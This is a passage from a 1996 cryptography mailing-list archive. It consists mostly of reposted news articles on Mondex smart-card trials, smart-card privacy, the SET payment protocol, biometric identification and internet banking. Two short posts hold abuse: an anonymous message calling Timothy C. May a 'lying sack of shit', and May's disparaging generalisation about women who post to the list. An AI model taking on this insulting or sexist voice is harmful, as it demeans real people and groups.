pay the price of unanticipated stardom. "Our town center store is small," said Bob Upshall, manager of the Sainsbury supermarket, part of one of Britain's biggest chains. "Having Mondex raised our profile and provided a morale boost." At the corporate level, Sainsbury was eager to participate in Mondex because "it didn't want to be left behind." So the smaller, convenience-oriented Swindon outlet, which otherwise might have relied for years on older computers and point of sale equipment, got an upgrade on a par with many "superstores," and Mr. Upshall said, "My staff loved it. A positive staff is a plus for customer take-up." Sainsbury, a Midland Bank customer, invested 45 minutes per cashier in Mondex training and found the system was so easy to grasp that it didn't have to deploy, as anticipated, demonstrators in the checkout lanes. Mondex volumes were running at less than 0.5% of sales at the three Swindon stores -- slightly lower in the town center location than at the larger branches on the outskirts of town. Mr. Upshall said an incentive offer in May and June of a five-pound voucher (about $7.50) for every 50- pound ($75) shopping trip brought in transactions well above the average ticket of five pounds in-town and 30 pounds ($45) elsewhere. "Whether smart cards will be in Mondex or other forms, they are here to stay," Mr. Upshall said. He gauged customer reaction as "very positive," though mainly among early adopters. He himself likes Mondex as a consumer -- "I use it in the canteen all the time" -- and as a merchant, because it streamlines the cash-handling tasks that require two to three full-time positions in the supermarket's back office. Nearby in McElroy's, a local department store, Vince Ayris accepts and encourages Mondex payments at his shoe repair and key-making stand. Mr. Ayris has been in the business 17 years, is a well-known man about town, and so strongly believes in Mondex that he essentially sold it to the local rugby club, where "we use it quite a lot. I find I'm more careful about spending money (with Mondex) than with cash, and it's easier than small change." Mr. Ayris admitted to being "a bit skeptical at first," but he has become so strong a booster that Mr. Gordon felt he had to deny that Mr. Ayris is in Mondex's employ. "I don't give money away to a bank like I do with a MasterCard or Visa discount," the merchant said. "There is no problem with fraud or counterfeit. "I have more over-ring errors on the till than on Mondex terminals. Every transaction is documented so disputes are more easily resolved" than with cash. And because the Mondex terminal is smaller than a cash register, "I have more room for selling product." Mondex is also proving itself at a multiplex movie complex, part of the MGM chain that Virgin Enterprises recently acquired. John Keil, the manager, said he "needed no convincing" to accept Mondex at every point of sale. "We saw the benefit immediately. Any way at all to take cash out of the system, the better. "The bigger the business, the more problem cash is," Mr. Keil went on. "Any major company sees the benefits in the technology." Like the supermarket, the MGM outlet easily won staff support. "Most of them are into gadgetry," Mr. Keil said. It also encouraged sales by cutting Mondex users' ticket price to about $4.90 from $6.80. The transactions are still a small portion of the 30% of in-person box-office sales done on plastic cards. (Another 30% are advance sales by phone; Mondex has not yet been accepted that way.) Mr. Keil said he is looking forward to having "one box" that can accept all cards. Even so, he said Mondex was "very flexible, requiring no change whatsoever to our system. It was slotted right in ... They made their system fit ours." "I think the system will take off eventually," Mr. Keil said. His only regret is that because he doesn't live in Swindon, he can't use Mondex more than he does. It is as if Mondex has succeeded at recruiting its merchants as change agents. Time will tell if they are still on board when Mondex begins costing them something. "The chip brings a fundamental change," said Mr. Pratt of Mondex UK. "You feel as if you are shaping the future. "When the market begins using it to create its own needs and to solve its own problems, that's when the real thrill will come -- and a surge in usage." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From nobody at replay.com Wed Sep 18 00:38:56 1996 From: nobody at replay.com (Anonymous) Date: Wed, 18 Sep 1996 15:38:56 +0800 Subject: A daily warning regarding Timothy C. May Message-ID: <199609180341.FAA02454@basement.replay.com> Timothy C. May is a lying sack of shit. From dlv at bwalk.dm.com Wed Sep 18 00:53:40 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:53:40 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: AP Online: Sunday, September 15, 1996 Card Raises Privacy Issues By PATRICIA LAMIELL Big Brother is not watching. Or is he? Fears resembling those of the omniscient machine that spies on people in their homes in George Orwell's novel, ''1984,'' have found their way into a new technology entering the marketplace -- smart cards. These credit cards embedded with computer chips can store information from shoe size to credit history. But critics claim these cards will be used to compile dossiers on the people who use them. And now it's up to the Smart Card Forum, a family of companies driving development of smart card technology, to convince the public that Big Brother isn't watching, for smart cards are protected and confidential. ''There's a huge amount of misunderstanding, and that creates a huge amount of fear, about whether these products are going to decrease people's privacy or otherwise leave them unprotected,'' said John Burke, the forum's attorney and a partner at the law firm of Foley, Hoag & Eliot in Washington, D.C. Starting Monday in San Francisco, members of the Smart Card Forum will meet to discuss the latest technology and marketing programs necessary to put a smart card in every household. In many ways, smart cards resemble credit and debit cards that the market has grown accustomed to using. With a simple swipe, they too can substitute cash when buying everything from subway tokens to clothing and the purchase price is electronically deducted from the card using a special machine. But the smart card takes the technology further, embedding a computer chip into the card. that gives it much more memory and enables it to do simple math and process information, like keeping a bank balance or tracking frequent flier miles. The huge potential scope of the smart card has prompted some concerns about the privacy rights of users. By tracking small purchases, telephone and transportation records, they can document a person's everyday movements. That information could be useful to everyone from employers and family members to law enforcement officials and banks. Marketers might be very interested in records of purchases made with smart cards. But privacy experts question whether third parties should gain access to see such information. The American Civil Liberties Union of New Jersey is fighting a state proposal to encode fingerprints on smart card drivers licenses on the premise that it would treat as criminals people who are not suspected of a crime. ''We also oppose the requirement that other data be included'' on New Jersey drivers licenses, said David Rocah, an ACLU staff attorney in Newark, ''unless precautions are made to insure that third parties will not have access to that data.'' Others, however, counter the questions of privacy, claiming that owners can control what information goes onto them and with whom it is shared. They also point out that the information is electronically scrambled, or ''encrypted, '' making it very difficult to steal. The Smart Card Forum is working to create privacy guidelines that can keep pace with the fast-developing industry. Federal regulators, such as the Office of the Comptroller of the Currency, the Federal Reserve and the Federal Deposit Insurance Corp., are all considering whether and how to regulate smart cards. Smart cards are a huge business for companies like Texas Instruments Inc. and Motorola Inc., which make the chip. They could also be a boon for banks and other financial institutions that issue the cards for a fee, and for payments-systems networks like Visa and MasterCard, which earn a percentage of each transaction. ''This is a huge, huge market,'' said Peter Hill, executive vice president for technology at Visa International, one of the 225 corporate members of the forum. ''Cash transactions world-wide total about $8 trillion a year, of which 80 percent are for $10 or less.'' A number of big banks have run pilot programs to test consumers' acceptance of the cards. Some have teamed up with Visa and MasterCard to do market tests in Swindon, England, Canberra, Australia, and at the 1996 Summer Olympic Games in Atlanta. A test is planned by MasterCard, Visa, Chase Manhattan Corp. and Citicorp, in New York's Upper West Side later this year. So far the pilot projects, which have put about 50,000 smart cards in circulation worldwide, have had mixed results. Many worry consumers will not incorporate the cards into purchases they now make with cash, and that has left merchants wary about the cards also. To move beyond the arena of small purchases, members of the Smart Card Forum are developing technology to allow people to use home computers to pay for Internet purchases with these cards, and to download cash onto a smart card. Personal-computer makers have begun including chip readers in PCs for these purposes. Also in development are scores of non-financial applications, such as keeping drivers license and medical information, transferring government welfare or medical benefits, and making airline and hotel reservations. To Diane Wetherington, MasterCard's senior vice president for smart cards, the Forum's biggest task is not the social and legal issues surrounding the smart card, but getting consumers to use it for any and all financial transactions down to the 10-year-old's weekly allowance and merchants to accept it. ''The technology works, the product works,'' she said. ''Now it is up to the marketing associations and companies to really try to create global products from these.'' American Banker: Monday, September 16, 1996 FUTUREBANKING SET a Big Win for the Card Associations By JEFFREY KUTLER Whether for superstitious reasons or just to avoid the inevitable groans, experts in data security were long reluctant to use a certain, pertinent pun. But now it can be officially uttered: SET is set. Secure Electronic Transactions, the Internet payment protocol hashed out by MasterCard, Visa, and a sometimes unruly bunch of technology providers, went up on the card associations' Web sites in June in what was labeled as its final form. In other words, the standard was ready for prime time. Software developers could begin incorporating it in systems being designed for electronic transactions. And thus began something of a race to make SET-- secured card payments a reality, at least in a test mode, by yearend. The principals were too busy and running too fast to celebrate their hard-won accomplishment. There was far more work to be done, and in their haste to get to it they may never have adequately explained the document's true significance. The SET advocates met their objective. Getting past their internal divisions, they wrote specifications for on-line credit card transactions and were unanimous in their endorsement. Relying on data encryption and digital certification of buyers, sellers, and bank processors, they erected several barriers to electronic thievery. They did not make the Net safe for all commercial and monetary activity. Nor did they silence a number of critics who still raise warning-flags about the Internet's inherent vulnerabilities, even those addressed by SET. The development of the protocol was well-chronicled. Probably too well from the standpoint of MasterCard and Visa, which had hoped that their mid- 1995 move to cooperate -- on the assumption that payment security should not be a competitive venue -- would lead to a rapid conclusion of amicable, low-profile deliberations. The diplomatic initiative derailed in the fall of 1995 when Microsoft Corp., sitting on Visa's side of the table, failed to reconcile with the opposing camp that included two of Microsoft's market adversaries, International Business Machines Corp. and Netscape Communications Corp. After a couple of months of fence-mending, the negotiations were declared back on track Feb. 1. Within a month the working draft of SET was completed, supposedly drawing the best features from the initially separate MasterCard and Microsoft-Visa proposals. As the June deadline approached, most of the organizations directly involved in SET -- they included GTE Corp., Science Applications International Corp. (SAIC), and companies associated with the data encryption leader RSA Data Security Inc. -- announced they would provide products and services implementing the protocol. Verifone Inc. hit the ground running June 18 with a comprehensive electronic commerce package that it said would be the "first implementation" of SET, supported by numerous strategic allies from the SET circle and beyond. Said Verifone's Internet commerce division chief Roger B. Bertman, "This will help the industry benefit more quickly from increased Internet transaction volumes and allow us all to begin learning by doing." Verifone had reportedly pressed to join the SET team, only to run up against the members' desire to stay small. But Verifone was very plugged in, and Mr. Bertman's "learning by doing" could have been their motto. By implication, publication of SET was just one more beginning. At the heart of SET is data encryption technology, specifically that provided and championed by RSA of Redwood City, Calif. In the encryption field, science meets commerce. The plodding of the scientific method tempers businesses' drive to get products to the market. Further complicating any venture into encryption -- the mathematical technique for scrambling messages to prevent unauthorized reading -- is the overhang of public policy. RSA and its progeny have chafed at federally imposed limits on cryptographic systems, particularly on the length of the code-defining keys they can export. While most financial activities are not hindered by the government's concern about "strong encryption," any banking or payment-related activity is surely to be scrutinized by that industry's regulatory establishment. It is only 20 years since the advent of public key cryptography. Improvements have been continuous, at least theoretically enabling the guardians of secure data to stay a step ahead of criminal pursuers. That SET could come together in a few months of concentrated effort is testimony to the strength and durability of the concept. As in academic tradition, what is tested and proven wins out. MasterCard's and Visa's pre-SET attempts, Secure Electronic Payment Protocol and Secure Transaction Technology, "didn't incorporate enough of preexisting security standards," said Allan M. Schiffman, chief technology officer of Terisa Systems Inc., a Los Altos, Calif., company formed in 1995 by RSA and several other investors to develop secure systems for Internet commerce. "In dealing with crypto, it's nice for stuff to be out and analysts to take a shot at it," said Mr. Schiffman, whose company was intimately involved in SET and said back in April that it would build the protocol into its client and server toolkits. "Older standards that aren't broken are what crypto-developers want." SET's reliance on the proven didn't stop the sniping. Lee H. Stein, chairman of First Virtual Holdings Inc. in San Diego, designed his Internet commerce system such that payment data flow via a private communications channel rather than the World Wide Web. First Virtual is not yet ready to bank on encryption. SET may be a step in the right direction, but it didn't sway Mr. Stein. "Sensitive financial information is never to be on the Internet," Mr. Stein said at the Cyberpayments '96 conference in Dallas in June. "Has anyone here yet seen a hierarchical, encryption-based certification authority working at the consumer level?" Jerome Svigals, a California-based consultant and long-time advocate of smart cards, criticized the lack of portability of the customer certificates required for an SET transaction. Designed to be embedded in a personal computer, the certificates, or digital signatures, might better comport with the credit card transaction model by being stored on smart cards. Aharon Friedman, chairman and chief product developer of Digital Secured Networks Technology Inc. in Englewood Cliffs, N.J., has expressed concern about the software-only nature of SET. He said it requires a hardware component to be fully secure. Mr. Friedman, a one-time SAIC research physicist who founded his network security company last year, also said too much of an SET message is in clear text or subjected to "hash functions" that do not provide the high security levels of encryption. "Unlike hardware, software can be bypassed using a computer," Mr. Friedman said. He has suggested that a hardware-based approach be incorporated into SET at "a more elementary level" so that all the text can be encrypted. "He put it aggressively," Mr. Schiffman said of Mr. Friedman. "What he says is not wrong, but it was not unaccounted for" in SET revisions. Other SET defenders have pointed out that the three aforementioned critics have vested interests in, respectively, off-Internet payments, smart cards, and hardware. Mr. Friedman said he is a few months away from a hardware-software solution that would be economical for PCs and even laptop computers, but he was not ready to talk about specific pricing. More fundamentally, the SET group had to grapple with classic questions of appropriateness. The security measures had to fit the potential crimes, at a reasonable cost. As new electronic payment media develop, "people are going to realize that they can't guarantee 100% security," Geoffrey Baehr, a top network technology official at Sun Microsystems Inc., said at a banking conference earlier this year. "Instead, they will aim their development work at 100% acceptance of risk, and assume there is always some amount of fraud. "It happens, and there isn't much you can do about it other than best efforts." Focusing on the framework for card payments, the SET group put its best efforts toward standards for transaction software and the ever-critical authentication of cardholders, merchants, and banks, based on the digital certificates issued and maintained by "trusted parties." A big selling point is that merchants don't see buyers' credit card numbers; the system transparently validates them. RSA Data Security has a central, commercial interest in how SET develops and has taken on an associated, almost public-service responsibility for coordination. "SET is definitely the way to go to secure bank card transactions," said Kurt Stammberger, RSA's director of technology marketing. "We believe it will be huge. Otherwise we wouldn't have built a toolkit around it." Indeed, the "RSA Encryption Engine" brand will be on Verifone's software products -- vGate, vPOS, and vWallet -- the first of what should be many SET-related licenses. Because there will be a proliferation of on-line products, especially the virtual wallets at the consumer level, Mr. Stammberger said "RSA's role will be to make sure all the wallet implementations talk to all the merchant implementations and the banks." "Building cryptography is not trivial, but getting all the right people talking to each other can be even more of a challenge," Mr. Stammberger said. Meanwhile, Verisign Inc., spun off by RSA 17 months ago, is going after the certification piece of the business. In July it announced it was chosen by Visa International to provide Internet authentication through the member banks. Building a global infrastructure for the encryption-based certification product it calls Digital ID, Verisign views the Visa deal as a big mass-market opening for digital signatures. "The financial services industry is leading the charge in bringing Internet commerce to the consumer," said Verisign president and chief executive officer Stratton Sclavos, who has also signed breakthrough licensing pacts with Microsoft and Netscape. He expects market availability of his "high-volume, scalable-to-the-millions" product "as soon as SET is ready," by early next year. MasterCard designated the CyberTrust unit of GTE Corp., one of its partners in the SET project, as its private-label certificate provider. The announcement, within days of Visa-Verisign in late July, prompted some one- upmanship. MasterCard senior vice president Steve Mott predicted GTE would be "bigger, better, and faster" in the market. Visa U.S.A. president Carl Pascarella wanted to underscore that the Verisign-GTE face off means healthy competition, not a return to the earlier SET dissension. He said the card associations rejected the idea of a single certification authority because it could have been monopolistic. And while Visa members can now choose Verisign, and MasterCard members GTE, they could also be their own "CA" or pick from other suppliers. "Visa and MasterCard agreed to pursue different certification options," he said. "The technology will be more robust, and it will minimize the impact on issuers and acquirers. "Things are changing so fast, we don't want to be in the position of driving stakes into the ground. Our concern right now is to protect the banks, and SET does that." The Miami Herald: Monday, September 16, 1996 Firm Hopes Facial "Signature" to be Foolproof Don't look for twenty-something computer nerds at Identification Technologies International in Coral Gables. ITI, a high-tech firm founded in 1993, is run by David Bendel Hertz, an energetic septuagenarian. Hertz has held executive engineering positions at RCA and Celanese, has been a partner at the consulting firm McKinsey & Co. in New York and has taught business and law at the University of Miami. His latest venture focuses on a facial recognition system, with applications from building access to internet banking. "We are a start-up business, a research and development company," says Hertz, 77. "And now we're becoming an operative company." Hertz saw an opportunity in 1994. Conventional facial recognitions systems "were too slow and took too much computer memory," he says. And stored on a hard drive, the data were vulnerable to hackers. Hertz calls his solution One-to-One. It uses a camera to take a person's photo and compares it to a facial "pixel signature." The signature uses only 96 bytes of memory -- as opposed to 500 to 2,000 bytes in conventional systems -- and can be easily stored on a smart card. Hertz insists that even the most intelligent hacker won't be able to break into the system because the data is not available on a central computer system and a stolen smart card will not match the thief's facial characteristics. Hertz allows that ITI has spent more than $1 million so far, half from him and half from Peipers, a New York investment company. ITI offers its system in the form of a small black box, containing the camera and connected to a computer. One-to-One uses little memory because it focuses on specific characteristics, such as the position of the eyes and the form of the mouth, while older systems store a photo-like image of the face. "When we started," Hertz says from a University of Miami test lab, "the first thing we did was ask a plastic surgeon if there are sufficient differences between faces. "'Every face is different,' he answered. But what about identical twins, we wanted to know. "The surgeon said there are enough differences in their faces that some people -- like their mother -- always can recognize them." Using biometrics, the branch of biology that deals with data statistically and by mathematical analysis, One-to-One can recognize these differences as well as a mother. A niggling problem, however, is that the system may not recognize a characteristic that is not part of your signature, such as a new haircut or even a smile. So far, ITI has made 50 units, mostly for testing and evaluation. Priced at $2,000-$3,000, two of the units have been sold to Westinghouse Security Electronics, which does not manufacture facial recognition systems. Jorge Sousa, director of product development at Westinghouse's systems division, based in Santa Clara, Calif., says he is "convinced that biometrics has a future," and that his company is keenly interested in ITI's product. Citicorp is currently testing Hertz's system on its ATMs, and AktivNet, a Miami company, has agreed to try out 400 units in 1997 on its communications kiosks in airports and hotels geared to business travelers. Hertz has also presented One-to-One to the National Security Agency, which he says "exhibited high-level interest." ITI is being marketed in Europe, South Africa and the Middle East by a Dutch company, Digistration. Hertz sees customers ranging from airports to welfare agencies to sports arenas. "The market is large and growing every day," he says. David Leibowitz, managing director and analyst at Burnham Securities in New York, also sees a rising interest in sophisticated security systems. "There is every likelihood that more creative devices will be needed," said Leibowitz, who added that with the rise in crime and theft, "The security market is growing at a dramatic pace." Leibowitz points out that the security market can include everything from barbed-wire fences to combination locks to the high-tech devices manufactured by such companies as Sensormatic, Checkpoint and Knogo . "Should ITI's product prove itself in tests and go on to succeed in real-world applications," he said, "there is a good chance there would be a market for it." But he cautioned that between now and then, competitors may have developed similar or more innovative systems that affect ITI's potential to market its product. Hertz plans to hire 10 additional employees to market and distribute ITI products. They will join the 12 people currently on staff, an international group including a computer programmer, biomedical scientist and mathematical analyst. Their work has far-reaching implications: Hertz envisions a day when ITI develops systems and products that, for example, has the capability to "detect people in a crowd," to catch fugitives or help find missing persons. Retail Banker International: August 22, 1996 Chase Builds "Best Biometric" CHASE MANHATTAN is currently testing biometric voice printing for retail banking applications in two pilots in the New York area. The bank said these tests will be concluded before year-end, and could lead to the introduction of biometric voice printing in several retail channels as early as 1997. The two pilots now in progress are testing voice printing at branch offices, the most challenging environment for voice printing, due to ambient noise and distortion. Branch customers pick up a phone on the teller line and verify their identities instantly, saving the teller the time needed to check the validity of each customer's bank card. But the system's most dynamic application will be in remote delivery, and especially in phone banking, where customers' identities can be automatically verified as soon as they speak, allowing phone reps to call up all account data instantaneously. The bank expects to roll out voice printing first in high-risk wholesale operations, like funds transfer and treasury services, before introducing it to the retail side of the bank. "Voice is the best biometric," said Elizabeth Boyle, Chase VP for strategic implementation in New York. First, voice printing offers security in all channels, an advantage that techniques like fingerprinting and dynamic signature analysis do not enjoy. This means that customers can use the system for remote transactions and can open accounts without visiting a branch, for example. Second, customers are most comfortable with voice printing, which is considered far less intrusive that fingerprinting, for instance, and is completely invisible over the phone. Lastly, voice printing is the most effective security system, yielding the lowest percentage of false positives, and just as important, the lowest rate of false negatives. "We do not want to be in the position of telling customers that they are not who they are," Boyle explained. Chase's voice printing pilots use technology developed by Votan of Pleasantville, California, a firm currently under registration for an initial public offering valued at $30 million. Direct mutual funds provider Fidelity Investments is also working on the implementation of voice printing technology, and Citibank is currently running voice pilots by four separate vendors. Boyle said that twelve months ago, Chase decided against multiple- vendor pilots, believing the technology was changing too rapidly to make this approach economical. New York Times: Monday, September 16, 1996 Testing Whether Internet Readers Will Pay By MIKE ALLEN After extending its grace periods four times, The Wall Street Journal Interactive Edition says it will bar freeloaders from its World Wide Web site beginning Saturday. The results are being watched as a bellwether for prospects of charging for access to Web sites. Because of The Journal's fame and its high proportion of business users, founders of other sites figure that if The Journal does not succeed, they may have no chance of charging in the foreseeable future. Today's Web is a money pit, with sites getting some revenue from advertisers but virtually none from users. Nick Donatiello, a market researcher who surveys consumer attitudes about new technologies, said subscription fees might work in a special case like The Journal, but would remain rare. ``Consumers can surf the whole Web for less than $20 a month, so it's hard to convince them that they should pay for one little slice out of this enormous pie,'' said Donatiello, the president of Odyssey LP, a research firm in San Francisco. ``Paying for content is going to be dwarfed by having advertisers pay, not because the Web has a culture of free content, but because television has a culture of advertising-supported content.'' A message on the Journal's site (http://www.wsj.com) says, ``Avoid the rush and convert now to a paid subscription.'' The interactive Journal is charging $49 a year, or $29 to those who take the print Journal, which runs $164 a year. Neil F. Budde, the editor of the interactive edition, said many people were philosophically opposed to paying for information on the Web. But he said others would subscribe because of the site's features like Briefing Book, which offers news about a company, charts of stock performance and five years of financial data. ``These are not the people who have been on the Internet since Day One,'' he said. ``These are newer people, people who are in business, who say it's worth it not to have to look four different places on the Internet'' to find information that the Journal site pulls together. About 650,000 people registered during the interactive Journal's trial period. Thomas Baker, the business director of the interactive edition, said surveys of those users indicated 10 to 30 percent were willing to pay. ``If, at the end of the year, we had 20,000 to 25,000, that would be good,'' Baker said. ``We're realists. Our expectations are fairly modest. We look at this as a magazine start-up, and even successful magazines take a while to ramp up.'' Baker said only 20 to 25 percent of those surveyed subscribed to the print Journal. ``That helped allay people's fear of the cannibalization of the print readership,'' he said. When the site opened in April, it offered free access through July 31. That was extended to Aug. 31, then Sept. 21. The deadline to register was May 31, then June 30, then Aug. 1. There is still a loophole: Access to the on-line Journal is free through Dec. 31 to those who download the Microsoft Corp.'s Web browser, Internet Explorer. Also free: two-week trials of the Journal site. Barron's, a weekly that like the Journal is published by Dow Jones & Co., thought big when it announced its Web site in May, saying it planned to charge $99 a year for basic access, and even more for premium areas like an Investors Workstation. That would have made it the most expensive mass-market site on the Web. The plan has been rethought. Barron's Online (http://www.barrons.com) has remained free, and a spokesman said the future subscription price had not been determined. The Web site of The New York Times requires users to register but does not charge. About 600,000 have signed up since the site (http://www.nytimes.com) opened in January. ``Our view is that market share is a more important criterion for success than whether you can get a few people to pay for the service,'' said Martin A. Nisenholtz, the president of The New York Times Electronic Media Co. ``But we continue to evaluate our users' willingness to pay for information on line.'' The other best-known news sites, including those from CNN, USA Today, The Washington Post and The Los Angeles Times, are open to all. ESPN's site (http://espnet.sportszone.com) charges $39.95 a year for access to premium areas, including columnists. But that service, too, is free until the end of the year through Microsoft Explorer. Microsoft, meanwhile, has found an old-fashioned way to get some income from its on-line magazine, Slate: sell paper copies. Slate on Paper went on sale this month in many Starbucks coffee boutiques, and mail subscriptions are available. The 62-page digest of the on-line version is produced in Microsoft's print shop. The paper Slate is $29.95 a year. That's $10 more than the on-line version will be when it starts charging for access on Nov. 1. The site (http://www.slate.com) was started in June with great fanfare from traditional media, but it continues to be skewered in the on-line world. The September issue of Wired magazine inaugurated the Kinsley Deathwatch, a pool to predict when Michael Kinsley, Slate's editor, will return from Redmond, Wash., to the other Washington. Slate on Paper, which includes about one-third of the Web version, includes an editors' note heralding ``the transmutation of all-digital Slate to the fusty comfort of analog paper and ink.'' ``To the best of our knowledge, Slate on Paper is the first Webzine to reverse the process,'' the note says. ``Some say it is fitting for two companies so closely associated with the image of Seattle - Microsoft and Starbucks - to be be joining forces. Others say it is beyond parody.'' A parody site, Stale (http://www.stale.com), pretends to offer a printed version, ``thereby defeating the purpose of being on the Web.'' Rogers Weed, Slate's publisher, said the print edition was ``a bridge to the people that aren't on the Internet today.'' But how many Starbucks customers want Chechnya with their frappuccino? Even some of the chain's employees are puzzled. ``This is Starbucks coffee,'' said Carol Hensler, who worked at a store in Richmond, Va. ``We only have coffee and coffee products.'' --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Wed Sep 18 01:09:41 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 16:09:41 +0800 Subject: A Bizarre Increase in the Ad Hominems Here Message-ID: Must be the Ides of September, but there are several bizarre new attacks lately on this list, none of them to the point, just odd ad hominems: * Detweiler (vznuri at netcom.com) writes: "timmy waxes a widdle on AP" * Millie (pstira at escape.com) writes: "Timmy boy, I yelled at someone for this last week. And you supported my view. Never read Ayn Rand, eh?" (Sadly, a large fraction of the women who have posted on our list have written in this same kind of incoherent, rambling, makes-no-sense kind of style. I have no idea why the percentage of such events is so high.) * And of course Vulis has been posting his "farting" messages far and wide. Those who legitimately disagree with my arguments should of course continue to speak up. But those who confuse calling me "Timmy" with making substantive arguments need to go back to school. We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Wed Sep 18 01:18:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 16:18:36 +0800 Subject: [NEWS] Crypto-relavant wire clippings Message-ID: Financial Times: Thursday, September 5, 1996 Banking on the Internet: Any Time, Anywhere By George Cole When Claus Nehmzow wants to check his bank statements or pay a bill, he simply switches on a personal computer. He can also transfer money between accounts and make electronic payments from almost anywhere in the world because his bank is on the Internet, the worldwide network of computers. Nehmzow, a principal with the management and technology consultancy firm Booz-Allen & Hamilton, says: "I live in England but my account is in the US. If I can find a computer that's linked to the Internet, I can access my account any time and anywhere." About 50m people have access to the Internet but this number is expected to reach 200m within two years. This huge audience, the ability to offer a 24-hour service across borders and the potentially enormous savings in operational costs, have prompted many banks and financial institutions to consider hooking up to the Internet. But while the Internet offers many advantages, one issue makes many banks nervous -- security. The potential of millions of people gaining unauthorised access to sensitive financial information on the Internet, and then using it to commit fraud is so great that few banks are prepared to offer online services. A survey by Booz-Allen found that more than 600 banks had sites on the Internet's World Wide Web. However, almost three-quarters of the banks simply used their sites as "electronic brochures" to promote their services. Only 2 per cent of European banks and 1 per cent of US banks offered full banking services on the Internet. "Security is holding back many banks, but the sheer economics of the Internet will see many of them offering services on it," says Michael McConnell, vice-president of Booz-Allen. "The cost of an Internet banking transaction can be measured in cents, while the same transaction at a bank branch costs dollars. You can't ignore these kind of savings." Piero Verdiani, vice-president of Olivetti Systems and Services' professional services division, says the Internet offers an average saving of $1.20 per transaction when compared with using a traditional bank branch. "For a customer who makes five transactions a week this works out at $300 a year. A bank with 100,000 customers could potentially save $30m a year," he says. Nehmzow believes that many of the concerns about security are more an issue of perception than of real obstacles: "People hear about hacking and get worried. Yet many people will happily give their credit card numbers over the phone, knowing that if anything should go wrong, their credit-card company will accept most of the liability. The same could happen with electronic banking." Some banks have opted for privately-owned online services rather than the Internet. The UK-based TSB bank, for example, offers its customers an electronic-banking facility called PC Banking, through the CompuServe online service. "It's a step-up from the Internet in terms of security, but in the long term, the Internet will be an important agent for financial services," says Bill Goodland, product manager for CompuServe's financial services division. Barclays is piloting a similar PC-based banking service for personal customers. The system, launched in February and developed with Visa Interactive, runs from Barclays software on a Windows-compatible PC and modem from customers' homes or offices. The attraction of the Internet is that users do not need to access proprietary PC banking software or special online services to carry out banking transactions. Nehmzow's electronic bank is the Security First Network Bank, based in Atlanta, Georgia. SFNB, which claims to be the first Internet bank, opened for service in October 1995. It has more than 2,000 customers, mostly professionals aged between 26 and 55. The SFNB uses a number of security features, which include issuing each customer with a personal identification number (Pin) and encrypting or scrambling any data that is sent over the Internet. The bank's internal computer network is protected by a "firewall" which filters all electronic traffic. This month, the US bank First City Bank and Trust plans to launch an Internet banking service using similar security facilities. In the UK, Midland Bank is working with Microsoft in order to offer Internet banking. Olivetti, and Sparekassernes Data Center, a consortium of 80 Danish savings banks, have formed a joint venture called FIT (Financial Internet Technology). FIT has developed E-Bank (Electronic Bank), a system which uses the Internet for banking from home, and offers various levels of security, including passwords, PIN codes and encryption. Some believe that Internet banking will take off when there is widespread use of a technology known as public-key cryptology. A key is a complex mathematical number that may be many hundreds of digits in length, creating hundreds of billions of potential combinations. The key is divided into a public key and a private key. The public key is available to anyone, and may be printed in a directory or even posted on to the Internet. The private key is kept secret by the owner. A message is sent to the owner by encrypting it with his or her public key. Only the correct private key can decrypt it. The public-key system also makes it possible to produce a "digital" signature. "This is important, because a bank will need to be confident that it is communicating with the genuine customer, and the customer needs to be certain that he's dealing with his bank," says McConnell. "It also provides proof that the customer authorised a particular transaction." A digital signature is created by the sender, who encrypts part of the message with his or her private key. The recipient of the message uses the sender's public key to decrypt the segment and thus confirm the identity of the sender. The system will automatically operate whenever a message is being sent or received over the Internet. Public-key systems will also be used for credit-card transactions. Visa International and Mastercard International have joined forces with a number of companies including GTE, IBM, Microsoft and Netscape to develop SET (Secure Electronic Transactions) which will allow users to make secure credit-card payments over the Internet: "It will mean that someone making a $ 10 transaction won't get billed for $10m," says Bernard Ovink, senior manager of Visa's electronic commerce division. SET is due to come into operation in late 1997. There are many encryption systems available, including several developed by RSA Data Security, based in Redwood California. RSA is providing the encryption technology for SET. The power of a key is measured in bits - an eight-bit key offers 256 possible combinations, while a 40-bit key has more than 1,000bn combinations. Some 40-bit keys have been cracked by cryptology enthusiasts, causing some to question the security of public-key systems. But McConnell says this fear is misplaced: "It took months to crack each key and a tremendous amount of computing power. But the question is: was it worth all the effort? It's like spending $100 to counterfeit a $ 20 bill." McConnell foresees a time when many people will have their own public and private keys: "I think you'll get an agency such as the Post Office distributing the keys to the public, and then financial organisations will use them to create online banking and other services. This is going to happen sooner than some people think." . American Banker: Thursday, September 5, 1996 OCC Allows Internet Access Plan, Eyeing Competitive Edge for Banks By OLAF de SENERPONT DOMIS A small bank in Pennsylvania has won the first regulatory approval to sell Internet access to the public, which could attract customers to on-line banking and other electronic services. The decision, released Tuesday by the Office of the Comptroller of the Currency, could help national banks compete with nonbank providers of on-line financial services, experts said. "The OCC is aggressively pushing the envelope with this decision, because it's allowing a service not directly related to banking," said Charles M. Horn, a partner at Mayer, Brown & Platt, a Washington law firm. "It is part of a natural progression toward letting banks expand the way they provide financial services." "The comptroller has recognized the critical importance of technology to the future of the banking industry," agreed Robert G. Ballen, a partner at the Washington law firm Schwartz & Ballen. "This is consistent with the comptroller's concern that banks be able to effectively compete with nonbanks." In an Aug. 19 letter to Apollo Trust Co. in Apollo, Pa., the OCC told the $105 million-asset bank it could sell general Internet access to anyone in its western Pennsylvania service area. The bank also was given permission to give free Internet access to schools, government offices, libraries, churches, and various nonprofit organizations. "We have a long-standing precedent of allowing banks to use the excess capacity of their physical facilities, and this ruling translates those old precedents into the technology world," Comptroller Eugene A. Ludwig said in an interview 